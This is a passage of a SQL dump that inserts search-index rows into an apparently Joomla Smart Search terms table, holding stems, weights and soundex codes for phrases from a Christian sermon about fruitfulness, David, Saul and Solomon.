(271238, 'pattern that his', 'pattern that his', 0, 1, 1.5333, 'P36532', 1, '*'),
(271239, 'people that are', 'peopl that are', 0, 1, 1.5, 'P436', 1, '*'),
(271240, 'person\'s style', 'person style', 0, 1, 1.4667, 'P625234', 1, '*'),
(271241, 'person\'s style be', 'person style be', 0, 1, 1.5667, 'P6252341', 1, '*'),
(271242, 'place of assignments', 'place of assignments', 0, 1, 1.6667, 'P4212532', 1, '*'),
(271243, 'pleasure of god', 'pleasur of god', 0, 1, 1.5, 'P426123', 1, '*'),
(271244, 'plentiful', 'plenti', 0, 0, 0.6, 'P45314', 1, '*'),
(271245, 'plentiful but', 'plenti but', 0, 1, 1.4333, 'P4531413', 1, '*'),
(271246, 'plentiful but labourers', 'plenti but labourers', 0, 1, 1.7667, 'P45314134162', 1, '*'),
(271247, 'potential john', 'potenti john', 0, 1, 1.4667, 'P353425', 1, '*'),
(271248, 'potential john 15', 'potenti john 15', 0, 1, 1.5667, 'P353425', 1, '*'),
(271249, 'potentials', 'potenti', 0, 0, 0.6667, 'P35342', 1, '*'),
(271250, 'potentials matthew', 'potenti matthew', 0, 1, 1.6, 'P3534253', 1, '*'),
(271251, 'potentials matthew 25', 'potenti matthew 25', 0, 1, 1.7, 'P3534253', 1, '*'),
(271252, 'pray it', 'prai it', 0, 1, 1.2333, 'P630', 1, '*'),
(271253, 'pray it took', 'prai it took', 0, 1, 1.4, 'P632', 1, '*'),
(271254, 'prayers luke', 'prayer luke', 0, 1, 1.4, 'P6242', 1, '*'),
(271255, 'prayers luke 5', 'prayer luke 5', 0, 1, 1.4667, 'P6242', 1, '*'),
(271256, 'prayers of', 'prayer of', 0, 1, 1.3333, 'P621', 1, '*'),
(271257, 'prayers of the', 'prayer of the', 0, 1, 1.4667, 'P6213', 1, '*'),
(271258, 'preparing', 'prepar', 0, 0, 0.6, 'P61652', 2, '*'),
(271259, 'preparing david', 'prepar david', 0, 1, 1.5, 'P61652313', 1, '*'),
(271260, 'preparing david to', 'prepar david to', 0, 1, 1.6, 'P61652313', 1, '*'),
(271261, 'produce fruit', 'produc fruit', 0, 1, 1.4333, 'P632163', 1, '*'),
(271262, 'produce fruit he', 'produc fruit he', 0, 1, 1.5333, 'P632163', 1, '*'),
(271263, 'producing', 'produc', 0, 0, 0.6, 'P63252', 1, '*'),
(271264, 'producing results', 'produc results', 0, 1, 1.5667, 'P6325262432', 1, '*'),
(271265, 'producing results how', 'produc results how', 0, 1, 1.7, 'P6325262432', 1, '*'),
(271266, 'proverbs 24', 'proverb 24', 0, 1, 1.3667, 'P61612', 1, '*'),
(271267, 'proverbs 24 3', 'proverb 24 3', 0, 1, 1.4333, 'P61612', 1, '*'),
(271268, 'prune', 'prune', 0, 0, 0.3333, 'P650', 1, '*'),
(271269, 'prune to', 'prune to', 0, 1, 1.2667, 'P653', 1, '*'),
(271270, 'prune to cleanse', 'prune to cleanse', 0, 1, 1.5333, 'P6532452', 1, '*'),
(271271, 'purpose it\'s', 'purpos it', 0, 1, 1.4, 'P61232', 1, '*'),
(271272, 'purpose it\'s not', 'purpos it not', 0, 1, 1.5333, 'P6123253', 1, '*'),
(271273, 'reaper', 'reaper', 0, 0, 0.4, 'R160', 1, '*'),
(271274, 'reaper in', 'reaper in', 0, 1, 1.3, 'R165', 1, '*'),
(271275, 'reaper in this', 'reaper in this', 0, 1, 1.4667, 'R16532', 1, '*'),
(271276, 'reapers', 'reaper', 0, 0, 0.4667, 'R162', 1, '*'),
(271277, 'reapers can', 'reaper can', 0, 1, 1.3667, 'R1625', 1, '*'),
(271278, 'reapers can god', 'reaper can god', 0, 1, 1.5, 'R162523', 1, '*'),
(271279, 'received and', 'receiv and', 0, 1, 1.4, 'R21353', 1, '*'),
(271280, 'received and the', 'receiv and the', 0, 1, 1.5333, 'R21353', 1, '*'),
(271281, 'recognized', 'recogn', 0, 0, 0.6667, 'R2523', 1, '*'),
(271282, 'recognized leader', 'recogn leader', 0, 1, 1.5667, 'R2523436', 1, '*'),
(271283, 'recognized leader god', 'recogn leader god', 0, 1, 1.7, 'R252343623', 1, '*'),
(271284, 'rejoices', 'rejoic', 0, 0, 0.5333, 'R200', 1, '*'),
(271285, 'rejoices when', 'rejoic when', 0, 1, 1.4333, 'R250', 1, '*'),
(271286, 'rejoices when his', 'rejoic when his', 0, 1, 1.5667, 'R252', 1, '*'),
(271287, 'replaceable', 'replac', 0, 0, 0.7333, 'R14214', 1, '*'),
(271288, 'replaceable material', 'replac material', 0, 1, 1.6667, 'R142145364', 1, '*'),
(271289, 'replaceable material you', 'replac material you', 0, 1, 1.8, 'R142145364', 1, '*'),
(271290, 'replacement for', 'replac for', 0, 1, 1.5, 'R1425316', 1, '*'),
(271291, 'replacement for saul', 'replac for saul', 0, 1, 1.6667, 'R142531624', 1, '*'),
(271292, 'result is', 'result is', 0, 1, 1.3, 'R2432', 1, '*'),
(271293, 'result is what', 'result is what', 0, 1, 1.4667, 'R24323', 1, '*'),
(271294, 'results 1', 'result 1', 0, 1, 1.3, 'R2432', 1, '*'),
(271295, 'results 1 prayers', 'result 1 prayers', 0, 1, 1.5667, 'R2432162', 1, '*'),
(271296, 'results how', 'result how', 0, 1, 1.3667, 'R2432', 1, '*'),
(271297, 'results how to', 'result how to', 0, 1, 1.4667, 'R24323', 1, '*'),
(271298, 'results stop', 'result stop', 0, 1, 1.4, 'R243231', 1, '*'),
(271299, 'results stop wasting', 'result stop wasting', 0, 1, 1.6667, 'R2432312352', 1, '*'),
(271300, 'results that', 'result that', 0, 1, 1.4, 'R24323', 1, '*'),
(271301, 'results that he', 'result that he', 0, 1, 1.5, 'R24323', 1, '*'),
(271302, 'results the', 'result the', 0, 1, 1.3667, 'R24323', 1, '*'),
(271303, 'results the father', 'result the father', 0, 1, 1.6, 'R24323136', 1, '*'),
(271304, 'rewards faithfulness', 'reward faithfulness', 0, 1, 1.6667, 'R32131452', 1, '*'),
(271305, 'rewards faithfulness not', 'reward faithfulness not', 0, 1, 1.8, 'R3213145253', 1, '*'),
(271306, 'right activity', 'right activity', 0, 1, 1.4667, 'R232313', 1, '*'),
(271307, 'right activity the', 'right activity the', 0, 1, 1.6, 'R232313', 1, '*'),
(271308, 'right method', 'right method', 0, 1, 1.4, 'R2353', 1, '*'),
(271309, 'right method and', 'right method and', 0, 1, 1.5333, 'R235353', 1, '*'),
(271310, 'right timing', 'right timing', 0, 1, 1.4, 'R2352', 1, '*'),
(271311, 'right timing david', 'right timing david', 0, 1, 1.6, 'R2352313', 1, '*'),
(271312, 'righteousness is', 'righteous is', 0, 1, 1.5333, 'R23252', 1, '*'),
(271313, 'righteousness is holiness', 'righteous is holiness', 0, 1, 1.8333, 'R23252452', 1, '*'),
(271314, 'said when', 'said when', 0, 1, 1.3, 'S350', 1, '*'),
(271315, 'said when saul', 'said when saul', 0, 1, 1.4667, 'S3524', 1, '*'),
(271316, 'salvation of souls', 'salvat of souls', 0, 1, 1.6, 'S41351242', 1, '*'),
(271317, 'same names', 'same names', 0, 1, 1.3333, 'S520', 1, '*'),
(271318, 'same names that', 'same names that', 0, 1, 1.5, 'S523', 1, '*'),
(271319, 'samuel 15', 'samuel 15', 0, 1, 1.3, 'S540', 1, '*'),
(271320, 'samuel 15 1-6', 'samuel 15 1-6', 0, 1, 1.4333, 'S540', 1, '*'),
(271321, 'samuel 18', 'samuel 18', 0, 1, 1.3, 'S540', 1, '*'),
(271322, 'samuel 18 18-absalom', 'samuel 18 18-absalom', 0, 1, 1.6667, 'S541245', 1, '*'),
(271323, 'samuel 5', 'samuel 5', 0, 1, 1.2667, 'S540', 1, '*'),
(271324, 'samuel 5 1-3', 'samuel 5 1-3', 0, 1, 1.4, 'S540', 1, '*'),
(271325, 'saul because he', 'saul because he', 0, 1, 1.5, 'S412', 1, '*'),
(271326, 'saul was', 'saul was', 0, 1, 1.2667, 'S420', 1, '*'),
(271327, 'saul was king', 'saul was king', 0, 1, 1.4333, 'S4252', 1, '*'),
(271328, 'saul was the', 'saul was the', 0, 1, 1.4, 'S423', 1, '*'),
(271329, 'saul\'s', 'saul', 0, 0, 0.4, 'S420', 1, '*'),
(271330, 'saul\'s armour', 'saul armour', 0, 1, 1.4333, 'S42656', 1, '*'),
(271331, 'saul\'s armour will', 'saul armour will', 0, 1, 1.6, 'S426564', 1, '*'),
(271332, 'see but', 'see but', 0, 1, 1.2333, 'S130', 1, '*'),
(271333, 'see but result', 'see but result', 0, 1, 1.4667, 'S136243', 1, '*'),
(271334, 'see that', 'see that', 0, 1, 1.2667, 'S300', 1, '*'),
(271335, 'see that all', 'see that all', 0, 1, 1.4, 'S340', 1, '*'),
(271336, 'separate activities', 'separ activities', 0, 1, 1.6333, 'S16323132', 1, '*'),
(271337, 'separate activities from', 'separ activities from', 0, 1, 1.8, 'S16323132165', 1, '*'),
(271338, 'servants luke', 'servant luke', 0, 1, 1.4333, 'S6153242', 1, '*'),
(271339, 'servants luke 19', 'servant luke 19', 0, 1, 1.5333, 'S6153242', 1, '*'),
(271340, 'service facefulness', 'servic facefulness', 0, 1, 1.6333, 'S612121452', 1, '*'),
(271341, 'service facefulness can', 'servic facefulness can', 0, 1, 1.7667, 'S6121214525', 1, '*'),
(271342, 'should not only', 'should not only', 0, 1, 1.5, 'S435354', 1, '*'),
(271343, 'show for', 'show for', 0, 1, 1.2667, 'S160', 1, '*'),
(271344, 'show for it', 'show for it', 0, 1, 1.3667, 'S163', 1, '*'),
(271345, 'sinners the', 'sinner the', 0, 1, 1.3667, 'S5623', 1, '*'),
(271346, 'sinners the lord', 'sinner the lord', 0, 1, 1.5333, 'S5623463', 1, '*'),
(271347, 'so that they', 'so that they', 0, 1, 1.4, 'S300', 1, '*'),
(271348, 'solomon', 'solomon', 0, 0, 0.4667, 'S450', 2, '*'),
(271349, 'solomon and', 'solomon and', 0, 1, 1.3667, 'S453', 1, '*'),
(271350, 'solomon and not', 'solomon and not', 0, 1, 1.5, 'S45353', 1, '*'),
(271351, 'solomon built', 'solomon built', 0, 1, 1.4333, 'S45143', 1, '*'),
(271352, 'solomon built the', 'solomon built the', 0, 1, 1.5667, 'S45143', 1, '*'),
(271353, 'something but', 'someth but', 0, 1, 1.4333, 'S535213', 1, '*'),
(271354, 'something but they', 'someth but they', 0, 1, 1.6, 'S535213', 1, '*'),
(271355, 'son that', 'son that', 0, 1, 1.2667, 'S530', 1, '*'),
(271356, 'son that builds', 'son that builds', 0, 1, 1.5, 'S531432', 1, '*'),
(271357, 'souls the', 'soul the', 0, 1, 1.3, 'S423', 1, '*'),
(271358, 'souls the fruit', 'soul the fruit', 0, 1, 1.5, 'S423163', 1, '*'),
(271359, 'special ability', 'special ability', 0, 1, 1.5, 'S124143', 1, '*'),
(271360, 'special ability that', 'special ability that', 0, 1, 1.6667, 'S124143', 1, '*'),
(271361, 'special care', 'special care', 0, 1, 1.4, 'S12426', 1, '*'),
(271362, 'special care to', 'special care to', 0, 1, 1.5, 'S124263', 1, '*'),
(271363, 'stole', 'stole', 0, 0, 0.3333, 'S340', 1, '*'),
(271364, 'stole the', 'stole the', 0, 1, 1.3, 'S343', 1, '*'),
(271365, 'stole the heart', 'stole the heart', 0, 1, 1.5, 'S34363', 1, '*'),
(271366, 'stop wasting', 'stop wasting', 0, 1, 1.4, 'S312352', 1, '*'),
(271367, 'stop wasting your', 'stop wasting your', 0, 1, 1.5667, 'S3123526', 1, '*'),
(271368, 'strange son', 'strang son', 0, 1, 1.3667, 'S36525', 1, '*'),
(271369, 'strange son that', 'strang son that', 0, 1, 1.5333, 'S365253', 1, '*'),
(271370, 'strategy', 'strategi', 0, 0, 0.5333, 'S3632', 1, '*'),
(271371, 'strategy 4', 'strategi 4', 0, 1, 1.3333, 'S3632', 1, '*'),
(271372, 'strategy 4 intimacy', 'strategi 4 intimacy', 0, 1, 1.6333, 'S36325352', 1, '*'),
(271373, 'style be', 'style be', 0, 1, 1.2667, 'S341', 1, '*'),
(271374, 'style be yourself', 'style be yourself', 0, 1, 1.5667, 'S3416241', 1, '*'),
(271375, 'takes special', 'take special', 0, 1, 1.4333, 'T2124', 1, '*'),
(271376, 'takes special care', 'take special care', 0, 1, 1.6, 'T212426', 1, '*'),
(271377, 'takes wisdom', 'take wisdom', 0, 1, 1.4, 'T235', 1, '*'),
(271378, 'takes wisdom to', 'take wisdom to', 0, 1, 1.5, 'T2353', 1, '*'),
(271379, 'temple according', 'templ according', 0, 1, 1.5333, 'T51426352', 1, '*'),
(271380, 'temple according to', 'templ according to', 0, 1, 1.6333, 'T514263523', 1, '*'),
(271381, 'temple.1', 'temple.1', 0, 0, 0.5333, 'T514', 1, '*'),
(271382, 'temple.1 chr', 'temple.1 chr', 0, 1, 1.4, 'T51426', 1, '*'),
(271383, 'temple.1 chr 28', 'temple.1 chr 28', 0, 1, 1.5, 'T51426', 1, '*'),
(271384, 'that are occupied', 'that are occupied', 0, 1, 1.5667, 'T6213', 1, '*'),
(271385, 'that bring about', 'that bring about', 0, 1, 1.5333, 'T165213', 1, '*'),
(271386, 'that builds', 'that builds', 0, 1, 1.3667, 'T1432', 1, '*'),
(271387, 'that builds a', 'that builds a', 0, 1, 1.4333, 'T1432', 1, '*'),
(271388, 'that give', 'that give', 0, 1, 1.3, 'T210', 1, '*'),
(271389, 'that give fruit', 'that give fruit', 0, 1, 1.5, 'T2163', 1, '*'),
(271390, 'that god frowns', 'that god frowns', 0, 1, 1.5, 'T231652', 1, '*'),
(271391, 'that had', 'that had', 0, 1, 1.2667, 'T000', 1, '*'),
(271392, 'that had only', 'that had only', 0, 1, 1.4333, 'T540', 1, '*'),
(271393, 'that he will', 'that he will', 0, 1, 1.4, 'T400', 1, '*'),
(271394, 'that his', 'that his', 0, 1, 1.2667, 'T200', 1, '*'),
(271395, 'that his father', 'that his father', 0, 1, 1.5, 'T2136', 1, '*'),
(271396, 'that led them', 'that led them', 0, 1, 1.4333, 'T435', 1, '*'),
(271397, 'that they bring', 'that they bring', 0, 1, 1.5, 'T1652', 1, '*'),
(271398, 'that will last', 'that will last', 0, 1, 1.4667, 'T423', 1, '*'),
(271399, 'that you\'re leading', 'that you leading', 0, 1, 1.6333, 'T64352', 1, '*'),
(271400, 'the anointing for', 'the anointing for', 0, 1, 1.5667, 'T535216', 1, '*'),
(271401, 'the apostles', 'the apostles', 0, 1, 1.4, 'T12342', 1, '*'),
(271402, 'the apostles in', 'the apostles in', 0, 1, 1.5, 'T123425', 1, '*'),
(271403, 'the body of', 'the body of', 0, 1, 1.3667, 'T131', 1, '*'),
(271404, 'the capacity of', 'the capacity of', 0, 1, 1.5, 'T21231', 1, '*'),
(271405, 'the day', 'the day', 0, 1, 1.2333, 'T000', 3, '*'),
(271406, 'the day that', 'the day that', 0, 1, 1.4, 'T000', 1, '*'),
(271407, 'the elders', 'the elders', 0, 1, 1.3333, 'T4362', 1, '*'),
(271408, 'the elders of', 'the elders of', 0, 1, 1.4333, 'T43621', 1, '*'),
(271409, 'the father john', 'the father john', 0, 1, 1.5, 'T13625', 1, '*'),
(271410, 'the father rejoices', 'the father rejoices', 0, 1, 1.6333, 'T1362', 1, '*'),
(271411, 'the flesh gal', 'the flesh gal', 0, 1, 1.4333, 'T1424', 1, '*'),
(271412, 'the fruit that', 'the fruit that', 0, 1, 1.4667, 'T163', 1, '*'),
(271413, 'the harvest', 'the harvest', 0, 1, 1.3667, 'T6123', 1, '*'),
(271414, 'the harvest is', 'the harvest is', 0, 1, 1.4667, 'T61232', 1, '*'),
(271415, 'the harvest of', 'the harvest of', 0, 1, 1.4667, 'T61231', 1, '*'),
(271416, 'the heart of', 'the heart of', 0, 1, 1.4, 'T631', 1, '*'),
(271417, 'the heavenly', 'the heavenly', 0, 1, 1.4, 'T154', 1, '*'),
(271418, 'the heavenly trust', 'the heavenly trust', 0, 1, 1.6, 'T1543623', 1, '*'),
(271419, 'the leader on', 'the leader on', 0, 1, 1.4333, 'T4365', 1, '*'),
(271420, 'the life 3', 'the life 3', 0, 1, 1.3333, 'T410', 1, '*'),
(271421, 'the lord came', 'the lord came', 0, 1, 1.4333, 'T46325', 2, '*'),
(271422, 'the outlook', 'the outlook', 0, 1, 1.3667, 'T420', 1, '*'),
(271423, 'the outlook but', 'the outlook but', 0, 1, 1.5, 'T4213', 1, '*'),
(271424, 'the pattern', 'the pattern', 0, 1, 1.3667, 'T1365', 1, '*'),
(271425, 'the pattern that', 'the pattern that', 0, 1, 1.5333, 'T13653', 1, '*'),
(271426, 'the recognized', 'the recognized', 0, 1, 1.4667, 'T62523', 1, '*'),
(271427, 'the recognized leader', 'the recognized leader', 0, 1, 1.7, 'T62523436', 1, '*'),
(271428, 'the results', 'the results', 0, 1, 1.3667, 'T62432', 1, '*'),
(271429, 'the results that', 'the results that', 0, 1, 1.5333, 'T624323', 1, '*'),
(271430, 'the right activity', 'the right activity', 0, 1, 1.6, 'T6232313', 1, '*'),
(271431, 'the right method', 'the right method', 0, 1, 1.5333, 'T62353', 1, '*'),
(271432, 'the right timing', 'the right timing', 0, 1, 1.5333, 'T62352', 1, '*'),
(271433, 'the same names', 'the same names', 0, 1, 1.4667, 'T252', 1, '*'),
(271434, 'the sinners', 'the sinners', 0, 1, 1.3667, 'T2562', 1, '*'),
(271435, 'the sinners the', 'the sinners the', 0, 1, 1.5, 'T25623', 1, '*'),
(271436, 'the temple according', 'the temple according', 0, 1, 1.6667, 'T51426352', 1, '*'),
(271437, 'the temple.1', 'the temple.1', 0, 1, 1.4, 'T514', 1, '*'),
(271438, 'the temple.1 chr', 'the temple.1 chr', 0, 1, 1.5333, 'T51426', 1, '*'),
(271439, 'the throne', 'the throne', 0, 1, 1.3333, 'T650', 2, '*'),
(271440, 'the throne but', 'the throne but', 0, 1, 1.4667, 'T6513', 1, '*'),
(271441, 'the throne wanting', 'the throne wanting', 0, 1, 1.6, 'T65352', 1, '*'),
(271442, 'the training', 'the training', 0, 1, 1.4, 'T652', 1, '*'),
(271443, 'the training go', 'the training go', 0, 1, 1.5, 'T652', 1, '*'),
(271444, 'the unfruitful', 'the unfruitful', 0, 1, 1.4667, 'T516314', 1, '*'),
(271445, 'the unfruitful christians', 'the unfruitful christians', 0, 1, 1.8333, 'T516314262352', 1, '*'),
(271446, 'the wells', 'the wells', 0, 1, 1.3, 'T420', 1, '*'),
(271447, 'the wells brought', 'the wells brought', 0, 1, 1.5667, 'T421623', 1, '*'),
(271448, 'the wells that', 'the wells that', 0, 1, 1.4667, 'T423', 1, '*'),
(271449, 'their full', 'their full', 0, 1, 1.3333, 'T614', 1, '*'),
(271450, 'their full potential', 'their full potential', 0, 1, 1.6667, 'T61413534', 1, '*'),
(271451, 'their is', 'their is', 0, 1, 1.2667, 'T620', 1, '*'),
(271452, 'their is battle', 'their is battle', 0, 1, 1.5, 'T62134', 1, '*'),
(271453, 'them and you', 'them and you', 0, 1, 1.4, 'T530', 1, '*'),
(271454, 'them he', 'them he', 0, 1, 1.2333, 'T500', 1, '*'),
(271455, 'them he was', 'them he was', 0, 1, 1.3667, 'T520', 1, '*'),
(271456, 'them out', 'them out', 0, 1, 1.2667, 'T530', 1, '*'),
(271457, 'them out and', 'them out and', 0, 1, 1.4, 'T5353', 1, '*'),
(271458, 'them the', 'them the', 0, 1, 1.2667, 'T530', 2, '*'),
(271459, 'them the same', 'them the same', 0, 1, 1.4333, 'T5325', 1, '*'),
(271460, 'them wicked', 'them wicked', 0, 1, 1.3667, 'T523', 1, '*'),
(271461, 'them wicked servants', 'them wicked servants', 0, 1, 1.6667, 'T523261532', 1, '*'),
(271462, 'there if', 'there if', 0, 1, 1.2667, 'T610', 1, '*'),
(271463, 'there if you', 'there if you', 0, 1, 1.4, 'T610', 1, '*'),
(271464, 'there is wisdom', 'there is wisdom', 0, 1, 1.5, 'T6235', 1, '*'),
(271465, 'they are doing', 'thei are doing', 0, 1, 1.4667, 'T6352', 2, '*'),
(271466, 'they bring', 'thei bring', 0, 1, 1.3333, 'T1652', 1, '*'),
(271467, 'they bring more', 'thei bring more', 0, 1, 1.5, 'T165256', 1, '*'),
(271468, 'they have nothing', 'thei have nothing', 0, 1, 1.5667, 'T15352', 1, '*'),
(271469, 'this end', 'thi end', 0, 1, 1.2667, 'T253', 1, '*'),
(271470, 'this end time', 'thi end time', 0, 1, 1.4333, 'T2535', 1, '*'),
(271471, 'this will birth', 'thi will birth', 0, 1, 1.5, 'T24163', 1, '*'),
(271472, 'those who bring', 'those who bring', 0, 1, 1.5, 'T21652', 1, '*'),
(271473, 'throne but', 'throne but', 0, 1, 1.3333, 'T6513', 1, '*'),
(271474, 'throne but as', 'throne but as', 0, 1, 1.4333, 'T65132', 1, '*'),
(271475, 'throne wanting', 'throne wanting', 0, 1, 1.4667, 'T65352', 1, '*'),
(271476, 'throne wanting his', 'throne wanting his', 0, 1, 1.6, 'T65352', 1, '*'),
(271477, 'time will you', 'time will you', 0, 1, 1.4333, 'T540', 1, '*'),
(271478, 'time with activities', 'time with activities', 0, 1, 1.6667, 'T5323132', 1, '*'),
(271479, 'timing david', 'time david', 0, 1, 1.4, 'T52313', 1, '*'),
(271480, 'timing david will', 'time david will', 0, 1, 1.5667, 'T523134', 1, '*'),
(271481, 'title but you', 'titl but you', 0, 1, 1.4333, 'T413', 1, '*'),
(271482, 'to approach an', 'to approach an', 0, 1, 1.4667, 'T1625', 1, '*'),
(271483, 'to bring about', 'to bring about', 0, 1, 1.4667, 'T165213', 1, '*'),
(271484, 'to carry the', 'to carry the', 0, 1, 1.4, 'T263', 1, '*'),
(271485, 'to cleanse', 'to cleanse', 0, 1, 1.3333, 'T2452', 1, '*'),
(271486, 'to cleanse those', 'to cleanse those', 0, 1, 1.5333, 'T245232', 1, '*'),
(271487, 'to curse a', 'to curse a', 0, 1, 1.3333, 'T262', 1, '*'),
(271488, 'to david and', 'to david and', 0, 1, 1.4, 'T1353', 1, '*'),
(271489, 'to gather', 'to gather', 0, 1, 1.3, 'T236', 1, '*'),
(271490, 'to gather there', 'to gather there', 0, 1, 1.5, 'T23636', 1, '*'),
(271491, 'to god\'s purpose', 'to god purpose', 0, 1, 1.5333, 'T2321612', 1, '*'),
(271492, 'to have fruitful', 'to have fruitful', 0, 1, 1.5333, 'T16314', 1, '*'),
(271493, 'to judge only', 'to judge only', 0, 1, 1.4333, 'T23254', 1, '*'),
(271494, 'to just', 'to just', 0, 1, 1.2333, 'T230', 1, '*'),
(271495, 'to just have', 'to just have', 0, 1, 1.4, 'T231', 1, '*'),
(271496, 'to pray it', 'to pray it', 0, 1, 1.3333, 'T163', 1, '*'),
(271497, 'to producing', 'to producing', 0, 1, 1.4, 'T163252', 1, '*'),
(271498, 'to producing results', 'to producing results', 0, 1, 1.6667, 'T16325262432', 1, '*'),
(271499, 'to prune', 'to prune', 0, 1, 1.2667, 'T165', 1, '*'),
(271500, 'to prune to', 'to prune to', 0, 1, 1.3667, 'T1653', 1, '*'),
(271501, 'to show', 'to show', 0, 1, 1.2333, 'T200', 2, '*'),
(271502, 'to show for', 'to show for', 0, 1, 1.3667, 'T216', 1, '*'),
(271503, 'to the capacity', 'to the capacity', 0, 1, 1.5, 'T2123', 1, '*'),
(271504, 'to the pattern', 'to the pattern', 0, 1, 1.4667, 'T1365', 1, '*'),
(271505, 'to their full', 'to their full', 0, 1, 1.4333, 'T614', 1, '*'),
(271506, 'to yield', 'to yield', 0, 1, 1.2667, 'T430', 2, '*'),
(271507, 'to yield fruits', 'to yield fruits', 0, 1, 1.5, 'T431632', 1, '*'),
(271508, 'today is filled', 'todai is filled', 0, 1, 1.5, 'T2143', 1, '*'),
(271509, 'took prayers', 'took prayers', 0, 1, 1.4, 'T2162', 1, '*'),
(271510, 'took prayers of', 'took prayers of', 0, 1, 1.5, 'T21621', 1, '*'),
(271511, 'training go', 'train go', 0, 1, 1.3667, 'T652', 1, '*'),
(271512, 'training go for', 'train go for', 0, 1, 1.5, 'T65216', 1, '*'),
(271513, 'tree that', 'tree that', 0, 1, 1.3, 'T630', 1, '*'),
(271514, 'tree that had', 'tree that had', 0, 1, 1.4333, 'T630', 1, '*'),
(271515, 'trust in your', 'trust in your', 0, 1, 1.4333, 'T62356', 1, '*'),
(271516, 'understanding the fruit', 'understand the fruit', 0, 1, 1.7667, 'U5362353523163', 1, '*'),
(271517, 'unfruitful', 'unfruit', 0, 0, 0.6667, 'U516314', 1, '*'),
(271518, 'unfruitful child', 'unfruit child', 0, 1, 1.5333, 'U516314243', 1, '*'),
(271519, 'unfruitful child he', 'unfruit child he', 0, 1, 1.6333, 'U516314243', 1, '*'),
(271520, 'unfruitful christians', 'unfruit christians', 0, 1, 1.7, 'U516314262352', 1, '*'),
(271521, 'unfruitful christians he', 'unfruit christians he', 0, 1, 1.8, 'U516314262352', 1, '*'),
(271522, 'unto the temple.1', 'unto the temple.1', 0, 1, 1.5667, 'U53514', 1, '*'),
(271523, 'use another', 'us another', 0, 1, 1.3667, 'U2536', 1, '*'),
(271524, 'use another person\'s', 'us another person', 0, 1, 1.6667, 'U253616252', 1, '*'),
(271525, 'vine branches', 'vine branches', 0, 1, 1.4333, 'V51652', 1, '*'),
(271526, 'vine branches he', 'vine branches he', 0, 1, 1.5333, 'V51652', 1, '*'),
(271527, 'want to just', 'want to just', 0, 1, 1.4, 'W5323', 1, '*'),
(271528, 'wanting his', 'want his', 0, 1, 1.3667, 'W5352', 1, '*'),
(271529, 'wanting his own', 'want his own', 0, 1, 1.5, 'W53525', 1, '*'),
(271530, 'wants to have', 'want to have', 0, 1, 1.4333, 'W53231', 1, '*'),
(271531, 'was concerned', 'wa concerned', 0, 1, 1.4333, 'W252653', 1, '*'),
(271532, 'was concerned david', 'wa concerned david', 0, 1, 1.6333, 'W25265313', 1, '*'),
(271533, 'was doing was', 'wa doing was', 0, 1, 1.4333, 'W2352', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(271534, 'was king', 'wa king', 0, 1, 1.2667, 'W252', 1, '*'),
(271535, 'was king over', 'wa king over', 0, 1, 1.4333, 'W25216', 1, '*'),
(271536, 'was preparing', 'wa preparing', 0, 1, 1.4333, 'W2161652', 1, '*'),
(271537, 'was preparing david', 'wa preparing david', 0, 1, 1.6333, 'W2161652313', 1, '*'),
(271538, 'was the leader', 'wa the leader', 0, 1, 1.4667, 'W23436', 1, '*'),
(271539, 'was the one', 'wa the one', 0, 1, 1.3667, 'W235', 1, '*'),
(271540, 'was the recognized', 'wa the recognized', 0, 1, 1.6, 'W2362523', 1, '*'),
(271541, 'wasting your', 'wast your', 0, 1, 1.4, 'W23526', 1, '*'),
(271542, 'wasting your time', 'wast your time', 0, 1, 1.5667, 'W2352635', 1, '*'),
(271543, 'water 6', 'water 6', 0, 1, 1.2333, 'W360', 1, '*'),
(271544, 'water 6 do', 'water 6 do', 0, 1, 1.3333, 'W363', 1, '*'),
(271545, 'we gather', 'we gather', 0, 1, 1.3, 'W236', 1, '*'),
(271546, 'we gather and', 'we gather and', 0, 1, 1.4333, 'W23653', 1, '*'),
(271547, 'wells', 'well', 0, 0, 0.3333, 'W420', 1, '*'),
(271548, 'wells brought', 'well brought', 0, 1, 1.4333, 'W421623', 1, '*'),
(271549, 'wells brought forth', 'well brought forth', 0, 1, 1.6333, 'W421623163', 1, '*'),
(271550, 'wells he', 'well he', 0, 1, 1.2667, 'W420', 1, '*'),
(271551, 'wells he dug', 'well he dug', 0, 1, 1.4, 'W4232', 1, '*'),
(271552, 'wells that', 'well that', 0, 1, 1.3333, 'W423', 1, '*'),
(271553, 'wells that his', 'well that his', 0, 1, 1.4667, 'W4232', 1, '*'),
(271554, 'what god judges', 'what god judges', 0, 1, 1.5, 'W323232', 1, '*'),
(271555, 'what god was', 'what god was', 0, 1, 1.4, 'W3232', 1, '*'),
(271556, 'what men', 'what men', 0, 1, 1.2667, 'W350', 1, '*'),
(271557, 'what men see', 'what men see', 0, 1, 1.4, 'W352', 1, '*'),
(271558, 'when his', 'when his', 0, 1, 1.2667, 'W520', 1, '*'),
(271559, 'when his children', 'when his children', 0, 1, 1.5667, 'W524365', 1, '*'),
(271560, 'when saul', 'when saul', 0, 1, 1.3, 'W524', 1, '*'),
(271561, 'when saul was', 'when saul was', 0, 1, 1.4333, 'W5242', 1, '*'),
(271562, 'whenever jesus', 'whenev jesus', 0, 1, 1.4667, 'W5162', 1, '*'),
(271563, 'whenever jesus withdrew', 'whenev jesus withdrew', 0, 1, 1.7667, 'W516236', 1, '*'),
(271564, 'whenever their', 'whenev their', 0, 1, 1.4667, 'W51636', 1, '*'),
(271565, 'whenever their is', 'whenev their is', 0, 1, 1.5667, 'W516362', 1, '*'),
(271566, 'who bring', 'who bring', 0, 1, 1.3, 'W1652', 1, '*'),
(271567, 'who bring fruit', 'who bring fruit', 0, 1, 1.5, 'W1652163', 1, '*'),
(271568, 'wicked servants', 'wick servants', 0, 1, 1.5, 'W23261532', 1, '*'),
(271569, 'wicked servants luke', 'wick servants luke', 0, 1, 1.6667, 'W2326153242', 1, '*'),
(271570, 'will always enquire', 'will always enquire', 0, 1, 1.6333, 'W42526', 1, '*'),
(271571, 'will be amazed', 'will be amazed', 0, 1, 1.4667, 'W41523', 1, '*'),
(271572, 'will birth', 'will birth', 0, 1, 1.3333, 'W4163', 1, '*'),
(271573, 'will birth accuracy', 'will birth accuracy', 0, 1, 1.6333, 'W4163262', 1, '*'),
(271574, 'will last may', 'will last may', 0, 1, 1.4333, 'W4235', 1, '*'),
(271575, 'will need faithfulness', 'will need faithfulness', 0, 1, 1.7333, 'W453131452', 1, '*'),
(271576, 'will not work', 'will not work', 0, 1, 1.4333, 'W45362', 1, '*'),
